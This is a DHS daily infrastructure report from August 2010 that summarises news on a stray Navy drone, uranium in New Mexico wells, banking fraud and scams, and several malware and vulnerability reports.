Department of Homeland Security Daily Open Source Infrastructure Report

Friday, August 27, 2010

Complete DHS Daily Report for August 27, 2010

Daily Report

Top Stories

•According to The New York Times, a United States Navy drone wandered into restricted airspace August 2, and flying at 2,000 feet, got within 40 miles of Washington D.C. before operators could stop it. A Navy spokesman could not say August 25 if anyone on the ground was alarmed by the drone. (See item 14)

14. August 25, New York Times – (Maryland; District of Columbia) Navy drone wanders into restricted airspace around Washington. A United States Navy drone wandered into restricted airspace August 2 around Washington D.C. before operators could stop it. A Navy spokesmen could not say August 25 if anyone on the ground was alarmed by the drone — officially an MQ-8B Fire Scout Vertical Takeoff and Landing unmanned aerial vehicle — which looks like a small windowless helicopter, and was flying at 2,000 feet. The Navy said the drone got within 40 miles of Washington before operators were able to re-establish communication and guide it back to its base in southern Maryland. The incident resulted in the grounding of all six of the Navy’s Fire Scouts as well as an inquiry into what went wrong. The Navy is calling the problem a “software issue” that foiled the drone’s operators. Navy spokesmen said the Fire Scout, made by Northrop Grumman, was a little more than 1 hour into a test flight operating out of Naval Air Station Patuxent River on the Chesapeake Bay when operators lost its control link. The drone then flew 23 miles on a north-by-northwest course to enter Washington’s restricted airspace. A half-hour later, the Navy spokesmen said, operators re-established control and the drone landed safely back at Patuxent. Source:

•The city of Espanola, New Mexico shut down two wells this week after the state environment department found elevated levels of uranium in the water supply. (See item 33)

33. August 24, Santa Fe New Mexican – (New Mexico) Uranium found seeping into wells. Nature, not man, is the biggest source of uranium contamination in water around Espanola, Pojoaque, Nambe and Santa Fe, New Mexico. Several private water wells around Pojoaque and Nambe have twice tested with uranium levels three to six times higher than the federal recommended levels for safe drinking water. Meanwhile, Espanola shut down two wells this week after the state environment department found elevated levels of uranium in the water supply. The Espanola city manager said the wells will not be a problem in the future. "We plan to shut them off completely and to blend other wells that we do have in this area," he said in a statement. Around Santa Fe, a test of 475 wells last year found several with elevated uranium, but nothing compared to wells tested subsequently in Nambe and Pojoaque. The testing and analysis were part of New Mexico Small Business Assistance project between LANL and the Good Water Company of Santa Fe, which designs, installs and services water-purification systems. High uranium levels found in a half-dozen wells around the Nambe and Pojoaque corridor, between the Rio Grande and the Sangre de Cristo Mountains, mirrored the results of a larger study conducted in 2005 by Santa Fe County and LANL. "One well in the corridor tested with 60 times the EPA maximum contamination level for uranium," said the owner of Good Water Company. The U.S. Environmental Protection Agency set 30 micrograms per liter as the safe drinking-water standard. Wells in the Pojoaque and Nambe corridor measured with uranium levels from less than 30 to 1,800 micrograms per liter, according to a LANL groundwater chemist. Source: News/Uranium-found-seeping-into-wells


Banking and Finance Sector

15. August 25, WSB-TV 2 Atlanta – (Georgia) Police: Sovereign citizen busted with $302 billion in fake bonds. Investigators said a suspect tried to convince a Clayton County police officer that he did not have to follow any Georgia laws because he is a sovereign citizen. The officer pulled over the suspect's Chevy Avalanche in a traffic stop for speeding, but found he had no current tag, registration or insurance. A search of the truck found $108,000 hidden under the cup holders, police said. Then officers located several envelopes containing 12 fake surety bonds. "Basically, it's the U.S. government guaranteeing that this particular money is in the bank," said a police lieutenant who showed an investigative reporter one of the fraudulent documents allegedly worth $100 billion. The monetary total for all 12 fake bonds was $302.7 billion, police said. Investigators believe the suspect was planning to use the documents to attempt to steal houses, which was reported happening in neighboring counties in Georgia. Source:

16. August 25, Worcester Telegram & Gazette – (Massachusetts) Former bank employee gets probation in mortgage scheme. A former bank employee described by his lawyer as an unwitting participant in a mortgage fraud scheme was placed on probation August 25 after admitting in court in Worcester, Massachusetts he provided fraudulent financial documents to a mortgage broker. The 31-year-old suspect of Worcester, a former Bank of America employee, was placed on probation for 4 years after pleading guilty to 13 counts of publishing a false financial statement. Prosecutors said that while working at a Bank of America branch in Worcester, the suspect produced 13 verifications of deposit or VODs that enabled a mortgage broker of Marshfield, a co-defendant in the case, to create fraudulent loan applications resulting in more than $1 million in loans. One of the fraudulent documents indicated a loan applicant had more than $40,000 in her bank account when the account, which had been opened by the suspect, actually contained only $25, according to the assistant attorney general. The two defendants were among five people indicted in 2008 in connection with what prosecutors called a “sophisticated mortgage fraud ring." Source:

17. August 24, WDBJ 7 Roanoke – (Virginia) Area authorities caution: Beware of banking scam. Authorities are warning of a widespread scam in the Rocky Mount and Henry County, Virginia areas that could clean out customers' bank accounts. Sheriff's investigators and police said many of those targeted are members of the Martinsville DuPont Credit Union. Bank customers have been getting calls from an automated voice service claiming their debit card has been compromised. They are then asked to enter their card number in order to speak with the security department. Authorities remind, never give out personal banking information over the phone unless a customer has called the banking center directly. Between the credit union and authorities, they have been able to respond quickly, making sure that the few customers who did give out their information didn't lose money to the scammers. DuPont officials said the largest outage appears to be around $600 as of August 25. Source:,0,2566279.story

18. August 24, Associated Press – (Georgia) Man accused of threatening Aflac building in court. A man accused of threatening to fly a plane into a Columbus, Georgia insurance building appeared in court August 24. According to an FBI affidavit, federal authorities allege the 61-year-old suspect told an Aflac customer service representative that if a claim was not settled quickly, he would bring a shotgun to the Columbus insurance company, and also that he suggested he would fly a plane into the building. Authorities said it stems from a May 24 phone conversation. Authorities allege the employee cautioned the suspect against what he said, but he repeated it. The suspect was arrested May 27 at his Houston, Texas home. He could face a maximum of 5 years in prison on a charge of extortion/interstate threatening communications. Source:

19. August 24, Aberdeen Press and Journal – (International) Twelve climate-change activists arrested in capital day of protest. Twelve climate-change protesters were arrested during a day of mass action in Edinburgh, Scotland August 23. About 500 activists set up a so-called Camp for Climate Action behind the Royal Bank of Scotland (RBS) headquarters in the capital 5 days ago to protest against its funding of fossil fuel companies that they say are destroying the planet. The bank –- almost wholly owned by the U.K. government –- advised many staffers to work from home. Activists brought traffic to a halt after they created an “oil slick” on two of the main routes into the city. Lothian and Borders Police said a substance similar to diesel or vegetable oil was poured on the A720 Edinburgh bypass at Bankhead, and the westbound A8. Activists were criticized by police and politicians, who said a peaceful protest had taken a sinister turn. Five other activists were charged after a protest at the capital headquarters of Forth Energy, the firm behind controversial plans to build a renewable energy plant in Dundee. Source:

Information Technology

51. August 26, IDG News Service – (International) Scammers hit Twitter, Facebook, send free iPad spam. Facebook and Twitter users are complaining about their accounts being compromised and then being used to spam friends with suspicious "free iPad offers." Twitter warned users of the scam August 25, saying it was resetting passwords of affected users. "If you've received a message promising you a new iPad, not only is there no iPad, but also your friends have been hacked," Twitter said The scam is also hitting Facebook users too, according to a company spokesman. "It's affecting an extremely small percentage of people on Facebook, but we take all threats seriously," he said via e-mail. A researcher discovered his Twitter account had been used to direct message contacts late August 25. He noted the scammers sent direct messages to his friends, that said, "u have to check out this website its glitchin right now and sending out ipads to everyone for free!" He said the messages continued, even after he changed his password. The messages his friends received contained a link to That Web site asks for personal information, and then directs the user to a variety of promotional offers from legitimate companies such as Netfilx, the Doubleday Book Club, and Columbia House DVD. Online marketing programs pay cash for Web traffic, and hackers have found that by phishing victims and then using that information to break into legitimate Twitter and Facebook accounts, they can earn money. Source:

52. August 26, Help Net Security – (International) 25% of new worms are designed to spread through USB devices. In 2010, 25 percent of new worms have been specifically designed to spread through USB storage devices connected to computers, according to PandaLabs. These types of threats can copy themselves to any device capable of storing information such as cell phones, external hard drives, DVDs, flash memories and MP3/4 players. The technique is highly effective. With survey responses from more than 10,470 companies across 20 countries, it was revealed that about 48 percent of SMBs (with up to 1,000 computers) admit to having been infected by some type of malware over the last year. And 27 percent confirmed the source of the infection was a USB device connected to a computer. "There are now so many devices on the market that can be connected via USB to a computer," said PandaLab's technical director. "This is convenient for users, but since all these devices have memory cards or internal memory, it is feasible they could be carrying a virus." There is an increasing amount of malware which, like the dangerous Conficker worm, spreads via removable devices and drives such as memory sticks, MP3 players and digital cameras. The basic technique used is as follows: Windows uses the Autorun.inf file on these drives or devices to know which action to take whenever they are connected to a computer. This file, which is on the root directory of the device, offers the option to automatically run part of the content on the device when it connects to a computer. By modifying Autorun.inf with specific commands, cyber-crooks can enable malware stored on the USB drive to run automatically when the device connects to a computer, thus immediately infecting the computer in question. Source:

53. August 26, – (International) Scareware hits U.K. airport terminals. Security experts are warning users to exercise extreme caution when using publicly available Internet access terminals after malware was discovered on a terminal in a U.K. airport lounge. In a blog post, a Symantec Hosted Services senior software engineer explained that on a recent trip he noticed one of the Internet-connected PCs in a “large airport in England” was infected with fake anti-virus software known as "Defense Center Installer." Such malware claims a user is infected with a virus, and encourages them to buy the full version of the software to clean the fictitious infection, he explained. ”It's also common for this type of malware to try to uninstall legitimate anti-virus software, including Symantec's Norton Anti-Virus.” He added that the scareware had also used Windows APIs to manipulate the information displayed in Windows Security Center, making it look like Windows is claiming there is no AV installed. The engineer argued that far more malicious threats than scareware could be present at such Internet-connected terminals including keyloggers, which could harvest sensitive user account information such as Web mail or online banking log-ins. Source:

54. August 26, The Register – (International) Apple kills Jailbreakme Mac bug. Apple has purged Mac OS X of a browse-and-get-hacked vulnerability that first came to light 3 weeks ago, when the popular Jailbreakme service used it to root fully patched versions of the iPhone. The buffer overflow flaw in an OS component that parses fonts was one of 13 vulnerabilities Apple fixed in an update released August 24. It allowed attackers to remotely execute malicious code on vulnerable machines simply by getting the user to view a booby-trapped PDF document. A related bug was patched 2 weeks ago in iOS, which powers the iPhone, the iPad and the iPod Touch. The vulnerability in the latter devices was being actively exploited by Jailbreakme, allowing users to jailbreak their device by doing nothing more than visiting the site and flicking a slider. There were no reports of the vulnerability being exploited in OS X. The update also patched a hole in CFNetwork that allowed attackers to bypass secure sockets layer protection, and it fixed a variety of third-party components including ClamAV, Samba and PHP. Source:

55. August 26, The New New Internet – (International) Corporate ID theft used to jack code signing certificate. Security researchers with F-Secure have found a new set of spammed malware that uses corporate identity theft to steal Authenticode code-signing certificateS. The attack vector is new because of the use of legitimate contact information. “This is something we’ve seen before,” the researchers write. ”But this case seemed odd because the contact information appeared very genuine. Usually a valid but malicious certificate uses clearly bogus or dubious details.” The use of legitimate contact information is particularly worrisome because it makes it difficult for certification authorities to discern legitimate requests. “When scammers have access to a company’s e-mail, it is very difficult for a CA to verify whether the request coming from the company is genuine,” the researchers write. ”Mistakes will also happen in the future. It is very likely that we’ll see more of these cases in which an innocent company with a good reputation is used as a proxy for malware authors to get their hands on valid certificates.” Source:

56. August 25, DarkReading – (International) Careful with that third-party Web widget. Small- and mid-sized businesses use a lot of third-party Web applications: It saves them money and allows them to embed expertise that they might not otherwise have. But it can also open up their business and their customers to attack. The recent Network Solutions incident shows how this practice can go very wrong: Ten days ago, the Internet domain provider learned that a Web-services widget that it had placed on at least 120,000 parked Web pages was infecting visitors with malware. The firm reportedly downloaded the widget, known as the Small Business Success Index, on third-party online directory WidgetBox. As more businesses continue to use third-party code in their Web sites and import content from other sites, the security of their visitors increasingly relies on others. "Over the past five years, Web 2.0 has taken the world by storm," says the chief technology officer of Web scanning firm Dasient. "As a Web site administrator, your security is actually dependent on a bunch of third parties, so you should make sure to monitor all your code and widgets." Network Solutions is not the only Internet company to inadvertently host malicious code on its Web site. A year ago, The New York Times infected an unknown number of visitors with a rogue program after fraudsters posed as a legitimate advertiser and submitted a virus-laden ad to the news service. Other Web sites — such as, BusinessWeek and Fox News — have had to deal with similar problems. Source:

57. August 25, Sophos – (International) Malicious spammers launch major fake anti-virus attack. SophosLabs's worldwide network of email-monitoring stations has seen a tidal wave of malicious messages being spammed out with an attachment that redirects users' Web browsers to a fake anti-virus attack. The e-mails have subject names such as: Parking Permit and/or Benefit Card Order Receipt; You're invited to view my photos!; Appointment Confirmation; Your Bell e-bill is ready; Your Vistaprint Order Is Confirmed; and Vistaprint Canadian Tax Invoice. Opening the attached HTML file, however, redirects your Web browser to a hacked Web site containing a malicious iFrame (which Sophos detects as Troj/Iframe-FK). This, in turn, loads scripts from other Web sites that load a fake anti-virus attack that Sophos detects as Mal/FakeAV-EI. Mal/FakeAV-EI often disguises itself as a bogus version of McAfee VirusScan. Source:

58. August 25, – (International) Cisco issues security advisory for UC products. Cisco has released a security advisory to address vulnerabilities in a pair of its products. The company said that the update will plug security flaws in its Unified Communications Manager and Unified Presence lines. The US Computer Emergency Response Team (US-CERT) is advising administrators to review and install both updates. For the Unified Communications Manager, the update will patch a pair of security flaws that could allow denial-of-service attacks. Cisco said that an attacker could use a specially-crafted Session Initiation Protocol (SIP) message to trigger a processing error and bring down voice services on a targeted system. The Unified Presence patch also addresses the SIP-handling denial-of-service vulnerabilities within the messaging platform. Cisco said that it has yet to receive any reports of exploitation in the wild. The company said that there are no known workarounds for the vulnerabilities, though a free update has been posted. Administrators can obtain the updates through their IT service providers or through the company's technical assistance center. Source:

Communications Sector

59. August 25, Des Moines Register – (Iowa) City of West Des Moines e-mail went down, should be back Monday. The city of West Des Moines, Iowa, had trouble with e-mail the week of August 23, but officials said the problem should be fixed by August 30. The city’s aging e-mail server crashed August 20, just as city staff were working to install a new server. The system’s demise was hastened by the proliferation of smartphones among city staff because the phones constantly check in with the server. “That constant traffic just brought it to its knees, so to speak,” the city’s IT director said. New inboxes for city staff were up and running by August 23, but all previous e-mail was inaccessible. Replacing the servers had been in the city’s budget this year, but had to be dropped as a cost-saving measure, the IT director said. When city staff realized a month ago the server would probably go down, they started to replace it anyway. The old one crashed as they were working on the new one. Residents who have not received a response to an e-mail to city staff should try to call, just in case their e-mail was lost or never reached the recipient. Source:

60. August 25, Colorado Springs Gazette – (Colorado) Man arrested for stealing thousands of feet of copper wiring. Police in Colorado Springs, Colorado, arrested a man August 24 on suspicion of stealing thousands of feet of copper wiring. The 20-year-old suspect admitted taking more than 3,500 feet of copper wiring from the back lot of Qwest Communications, 2264 Naegele Road in west Colorado Springs, police said. Police first noticed something might be awry in the area when they spotted a vehicle backed into an alley behind the Qwest building. Looking closer, police found a woman and child in the vehicle, along with thousands of feet of copper wiring laying nearby. Much of it had been cut into smaller spools. A short time later, police spotted the suspect in front of the business. He was booked into the El Paso County jail on suspicion of theft, second degree criminal trespass, and possessing burglary tools. Source:

61. August 25, WGAL 8 Lancaster – (Pennsylvania) Internet outage hit most state Web sites. It appears an Internet outage that affected most Pennsylvania government Web sites for hours August 25 has been fixed. Some of the key sites affected were: (1) State unemployment compensation system (unemployed could not file for claims online) (2) Department of Revenue (taxpayers could not make payments online). There is still no word at this time as to what caused the problem. Some state sites with independent servers, such as the Department of Public Welfare, Department of Transportation and the state's Megan's Law Web site, were able to remain up and running during the outage. The state's Internet access is handled by the office of information technology in the office of administration. Source: